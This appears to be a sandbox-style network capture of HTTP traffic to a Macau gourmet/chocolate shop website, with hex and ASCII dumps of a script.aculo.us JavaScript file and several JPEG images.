                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:41.638750076 CET2871INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 31969
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:11 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "74f712a3a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:47 GMT
                                                                                                                                                              Data Raw: 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 35 20 54 68 6f 6d 61 73 20 46 75 63 68 73 20 28 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 2e 61 63 75 6c 6f 2e 75 73 2c 20 68 74 74 70 3a 2f 2f 6d 69 72 2e 61 63 75 6c 6f 2e 75 73 29 0a 2f 2f 20 43 6f 6e 74 72 69 62 75 74 6f 72 73 3a 0a 2f 2f 20 20 4a 75 73 74 69 6e 20 50 61 6c 6d 65 72 20 28 68 74 74 70 3a 2f 2f 65 6e 63 79 74 65 6d 65 64 69 61 2e 63 6f 6d 2f 29 0a 2f 2f 20 20 4d 61 72 6b 20 50 69 6c 67 72 69 6d 20 28 68 74 74 70 3a 2f 2f 64 69 76 65 69 6e 74 6f 6d 61 72 6b 2e 6f 72 67 2f 29 0a 2f 2f 20 20 4d 61 72 74 69 6e 20 42 69 61 6c 61 73 69 6e 6b 69 0a 2f 2f 20 0a 2f 2f 20 53 65 65 20 73 63 72 69 70 74 61 63 75 6c 6f 75 73 2e 6a 73 20 66 6f 72 20 66 75 6c 6c 20 6c 69 63 65 6e 73 65 2e 20 20 0a 0a 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 65 6c 65 6d 65 6e 74 20 65 78 74 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 20 20 0a 20 0a 2f 2f 20 63 6f 6e 76 65 72 74 73 20 72 67 62 28 29 20 61 6e 64 20 23 78 78 78 20 74 6f 20 23 78 78 78 78 78 78 20 66 6f 72 6d 61 74 2c 20 20 0a 2f 2f 20 72 65 74 75 72 6e 73 20 73 65 6c 66 20 28 6f 72 20 66 69 72 73 74 20 61 72 67 75 6d 65 6e 74 29 20 69 66 20 6e 6f 74 20 63 6f 6e 76 65 72 74 61 62 6c 65 20 20 0a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 73 65 43 6f 6c 6f 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 0a 20 20 76 61 72 20 63 6f 6c 6f 72 20 3d 20 27 23 27 3b 20 20 0a 20 20 69 66 28 74 68 69 73 2e 73 6c 69 63 65 28 30 2c 34 29 20 3d 3d 20 27 72 67 62 28 27 29 20 7b 20 20 0a 20 20 20 20 76 61 72 20 63 6f 6c 73 20 3d 20 74 68 69 73 2e 73 6c 69 63 65 28 34 2c 74 68 69 73 2e 6c 65 6e 67 74 68 2d 31 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 20 20 0a 20 20 20 20 76 61 72 20 69 3d 30 3b 20 64 6f 20 7b 20 63 6f 6c 6f 72 20 2b 3d 20 70 61 72 73 65 49 6e 74 28 63 6f 6c 73 5b 69 5d 29 2e 74 6f 43 6f 6c 6f 72 50 61 72 74 28 29 20 7d 20 77 68 69 6c 65 20 28 2b 2b 69 3c 33 29 3b 20 20 0a 20 20 7d 20 65 6c 73 65 20 7b 20 20 0a 20 20 20 20 69 66 28 74 68 69 73 2e 73 6c 69 63 65 28 30 2c 31 29 20 3d 3d 20 27 23 27 29 20 7b 20 20 0a 20 20 20 20 20 20 69 66 28 74 68 69 73 2e 6c 65 6e 67 74 68 3d 3d 34 29 20 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 34 3b 69 2b 2b 29 20 63 6f 6c 6f 72 20 2b 3d 20 28 74 68 69 73 2e 63 68 61 72 41 74 28 69 29 20 2b 20 74 68 69 73 2e 63 68 61 72 41 74 28 69 29 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 20 20 0a 20 20 20 20 20 20 69 66 28 74 68 69 73 2e 6c 65 6e 67 74 68 3d 3d 37 29 20 63 6f 6c 6f 72 20 3d 20 74 68 69 73 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 20 20 0a 20 20 20 20 7d 20 20 0a 20 20 7d 20 20 0a 20 20 72 65 74 75 72 6e 28 63 6f 6c 6f 72 2e 6c 65 6e 67 74 68 3d 3d 37 20 3f 20 63 6f 6c 6f 72 20 3a 20 28 61 72 67 75 6d 65 6e 74 73 5b 30 5d 20 7c 7c 20 74 68 69 73 29 29 3b 20 20 0a 7d 0a 0a 45 6c 65 6d 65 6e 74 2e 63 6f 6c 6c 65 63 74 54 65 78 74 4e 6f 64 65 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 20 7b 20 20 0a 20 20 72 65 74 75 72 6e 20 24 41 28 24 28 65 6c 65 6d 65 6e 74 29 2e 63 68 69 6c 64 4e 6f 64
                                                                                                                                                              Data Ascii: // Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)// Contributors:// Justin Palmer (http://encytemedia.com/)// Mark Pilgrim (http://diveintomark.org/)// Martin Bialasinki// // See scriptaculous.js for full license. /* ------------- element ext -------------- */ // converts rgb() and #xxx to #xxxxxx format, // returns self (or first argument) if not convertable String.prototype.parseColor = function() { var color = '#'; if(this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if(this.slice(0,1) == '#') { if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if(this.length==7) color = this.toLowerCase(); } } return(color.length==7 ? color : (arguments[0] || this)); }Element.collectTextNodes = function(element) { return $A($(element).childNod
                                                                                                                                                              Mar 13, 2023 05:26:42.264367104 CET2921OUTGET /images/video.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.469615936 CET2926INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 6434
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:28 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9e76e1f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 bb 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 07 08 09 05 01 02 01 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 04 06 07 08 10 00 01 03 02 02 04 0a 08 04 04 04 07 00 00 00 00 02 01 03 04 05 06 00 11 12 13 d4 07 21 31 d1 22 53 93 15 55 16 08 41 51 61 14 94 96 57 18 91 a1 32 23 71 81 c1 52 42 c2 33 24 b1 62 72 92 44 54 26 11 00 01 02 03 02 09 0b 02 03 06 05 05 00 00 00 00 01 00 02 11 03 04 21 12 31 51 61 91 52 13 05 15 06 f0 41 71 e1 22 92 d2 e2 53 93 14 81 32 a1 b1 07 c1 d1 42 b2 73 b3 62 72 82 33 63 f1 c2 23 24 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea 16 f3 6f ca 94 da d4 fa 73 53 5f 85 45 a6 1a 30 51 e3 9e 81 be ee 59 af 3b 2e 04 cb 87 3f 46 3c 27 8a 36 b4 dd a7 59 36 5b 9c 75 2c 71 60 64 7b 24 b0 96 b9 ce 1f c4 4b 81 85 e8 80 00 85 b1 50 b5 f5 4e 0e 2d 04 80 31 61 25 62 6f 12 c8 4e 01 67 49 3d 0a 72 65 29 7f 35 17 85 3f 2c 72 bb ba 97 d1 67 74 28 df 96 fc b9 dd fb d3 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 27 89 a4 f4 01 f1 13 36 8c 37 75 2f a2 ce e8 4f 99 33 91 77 89 3c 4d 27 a0 0f 88 99 b4 61 bb a9 7d 16 77 42 7c c9 9c 8b bc 49 e2 69 3d 00 7c 44 cd a3 0d dd 4b e8 b3 ba 13 e6 4c e4 5d e2 4f 13 49 e8 03 e2 26 6d 18 6e ea 5f 45 9d d0 9f 32 67 22 ef 12 78 9a 4f 40 1f 11 33 68 c3 77 52 fa 2c ee 84 f9 93 39 17 78 93 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 27 89 a4 f4 01 f1 13 36 8c 37 75 2f a2 ce e8 4f 99 33 91 77 89 3c 4d 27 a0 0f 88 99 b4 61 bb a9 7d 16 77 42 7c c9 9c 8b bc 49 e2 69 3d 00 7c 44 cd a3 0d dd 4b e8 b3 ba 13 e6 4c e4 5d e2 4f 13 49 e8 03 e2 26 6d 18 6e ea 5f 45 9d d0 9f 32 67 22 ef 12 78 9a 4f 40 1f 11 33 68 c3 77 52 fa 2c ee 84 f9 93 39 17 78 93 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 2a cc 5d 12 01 e6 dc cd e8 84 0a 8a 2f c5 92 fe 98 fb 51 1d 71 c4 5c bd 58 b9 94 54 ec 21 cc 96 d6 91 80 b4 5d 70 e8 22 d1 f4 55 6d 63 e3 69 23 a0 9f da 4a db 6d d5 dd d3 6e 3a 6c b8 95 47 7d e2 7d 31 dd 59 4b e2 d6 81 26 90 16 5e d1 54 5c 7b 17 02 ed a9 d5 b2 a6 c8 9e e2 f7 ca 2d 37 8e 12 c7 c6 ec 72 82 d7 08 f3 88 46 d8 ae 86 92 71 9a ce d6 10 60 b2 be 3b c5 b4
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1"SUAQaW2#qRB3$brDT&!1QaRAq"S2Bsbr3c#$4?osS_E0QY;.?F<'6Y6[u,q`d{$KPN-1a%boNgI=re)5?,rgt(zFgt'&L0;>dE$4>"fY&r.'67u/O3w<M'a}wB|Ii=|DKL]OI&mn_E2g"xO@3hwR,9xzFgt'&L0;>dE$4>"fY&r.'67u/O3w<M'a}wB|Ii=|DKL]OI&mn_E2g"xO@3hwR,9xzFgt'&L0;>dE$4>"fY&r.*]/Qq\XT!]p"Umci#Jmn:lG}}1YK&^T\{-7rFq`;
                                                                                                                                                              Mar 13, 2023 05:26:42.481144905 CET2935OUTGET /images/title_aboutus.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.686475039 CET2955INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1686
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7a79a3f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 14 00 44 03 01 11 00 02 11 01 03 11 01 ff c4 00 a4 00 00 02 02 02 03 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 03 07 02 08 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 10 00 00 04 04 05 01 06 03 05 09 00 00 00 00 00 00 01 02 03 04 13 05 15 16 00 11 12 14 06 07 21 31 22 32 42 24 41 23 17 51 61 52 b2 34 33 43 83 64 94 75 26 46 37 11 00 00 04 03 05 03 08 08 06 03 00 00 00 00 00 00 01 11 02 12 00 03 13 21 31 22 04 14 41 61 32 51 71 81 c1 42 23 05 06 f0 91 a1 b1 52 62 33 15 d1 f1 72 82 43 24 93 a3 35 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 04 10 9a 93 06 09 3d 6f 2d 55 f3 74 e6 2f 13 51 66 92 f3 2a 40 5d 54 d2 12 82 87 22 62 3a 8c 52 09 cb a8 40 32 0c c3 3e fc 29 53 e5 a5 61 2c 54 0e 10 11 00 30 31 00 bc 40 2f 10 03 03 e4 38 83 03 28 73 0d 89 83 04 10 60 82 0c 10 41 82 08 30 41 06 08 23 a6 dd 57 e5 92 57 5c c3 92 4f 43 92 cb 58 ce 7a 38 49 79 f8 ac 9d cb d4 51 55 eb c1 58 8f 26 84 49 15 0e 53 1b 5b 72 91 0f 09 44 44 d9 87 dd 8f 96 79 93 c4 a4 af 39 36 75 54 25 79 46 53 48 a8 00 56 b3 05 cd 00 01 13 13 40 02 2c 0b cc 37 46 09 eb 01 50 89 da 9b ba e3 63 f2 49 84 ca 73 d4 de 95 4c b8 7a ec 40 67 3c 62 70 e5 ac c6 60 45 16 45 36 ab 99 82 a0 ac 04 8e 91 95 11 01 00 02 c4 27 7e 7a bb 32 1e ee 7e 7c dc c7 89 e4 e6 65 45 38 e4 cc 10 52 80 44 01 23 4c 4d a0 20 2a d9 63 93 79 9d 90 d5 88 8a d2 29 da 03 d5 1c 91 ea af 25 54 11 e2 db 09 65 f8 b7 2c 73 c5 45 f0 15 6a 59 41 b3 60 7c 77 b0 45 40 54 42 01 80 01 28 b9 ea f5 80 62 51 e6 3c ca 8b 2e d4 6a 06 70 c9 3b 69 e1 4d 41 5b 4d dc 3d 87 19 f6 a0 09 ca e1 ed 19 6e e5 38 c7 c9 3a a1 cb 78 83 1e a4 4b a6 8d e5 33 0e 49 c3 64 cd 67 b2 79 9b 66 eb a2 c5 d3 67 4a 99 1d 2b 35 33 95 54 4c e4 39 04 3b 16 10 30 76 f6 77 0d 73 fe 61 cd e4 65 e6 a5 cc 04 2a 6c 99 69 98 95 00 08 21 49 50 b7 12 45 42 a0 10 10 1b 96 27 ba 05 ce 52 01 40 24 60 07 17 b9 ef 2a 9d 35 e7 3c 53 88 4b 41 8a 29 72 59 34 d9 e1 df 39 45 45 8c 8b 96 60 84 01 02 11 64 80 c4 cd 51 13 97 30 13 00 64 06 2f 7e 3b 39 cf 11 9e 8c f4 9c ac b6 80 4c 97 31 46 20 22 4a 43 5b 60 29 26 18 ad 0b c7 60 84 35 4b 10 58 24 36 80 c5 7f a1 0e f9 54 cb 81 30 99 72 39 f2 53 b2 39 5d f9 1a 1c c8 2e 0e c8 28 cc 1d 26 68 ee 56 74 bc 50 f0 80 10 00 84 d0 50 02 e6 6c b3 c6 2f 27 4d cd 4e c8 26 64 f9 80 b3 15 95 82 eb 16 a0 17 29 4b 53 be 5b 12 d0 b2 db e2 99 61 50 a0 c4 4f f3 86 38 b7 fd 9b ab 5f da 78 cf e4 7d 8b f8 77 fd 9c e7 e8 93 ee 5c 4a 3e aa b9 83 ae 28 52 79 fc ef 8c a3 d6 a9 ac 96 5e 2f 56 2f 50 21 39 5c cd d7 78 9b 36 c7 6c cc 1c 3b 3b 56 c2 55 97 2a
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedD!1"2B$A#QaR43Cdu&F7!1"Aa2QqB#Rb3rC$5?=o-Ut/Qf*@]T"b:R@2>)Sa,T01@/8(s`A0A#WW\OCXz8IyQUX&IS[rDDy96uT%yFSHV@,7FPcIsLz@g<bp`EE6'~z2~|eE8RD#LM *cy)%Te,sEjYA`|wE@TB(bQ<.jp;iMA[M=n8:xK3IdgyfgJ+53TL9;0vwsae*li!IPEB'R@$`*5<SKA)rY49EE`dQ0d/~;9L1F "JC[`)&`5KX$6T0r9S9].(&hVtPPl/'MN&d)KS[aPO8_x}w\J>(Ry^/V/P!9\x6l;;VU*
                                                                                                                                                              Mar 13, 2023 05:27:04.325867891 CET3287OUTGET /images/icon_Gallery.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.575179100 CET3315INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 31599
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "82ce70f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 1a 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 b9 00 00 01 01 00 03 00 00 00 01 00 37 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 31 38 20 31 31 3a 33 38 3a 32 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 b9 a0 03 00 04 00 00 00 01 00 00 00 37 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 19 04 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*7(12i ''Adobe Photoshop CS6 (Windows)2020:06:18 11:38:2302217nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:27:05.021327972 CET3386OUTGET /images/icon_Gallery.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:05.226712942 CET3394INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 31599
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "82ce70f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 1a 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 b9 00 00 01 01 00 03 00 00 00 01 00 37 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 31 38 20 31 31 3a 33 38 3a 32 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 b9 a0 03 00 04 00 00 00 01 00 00 00 37 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 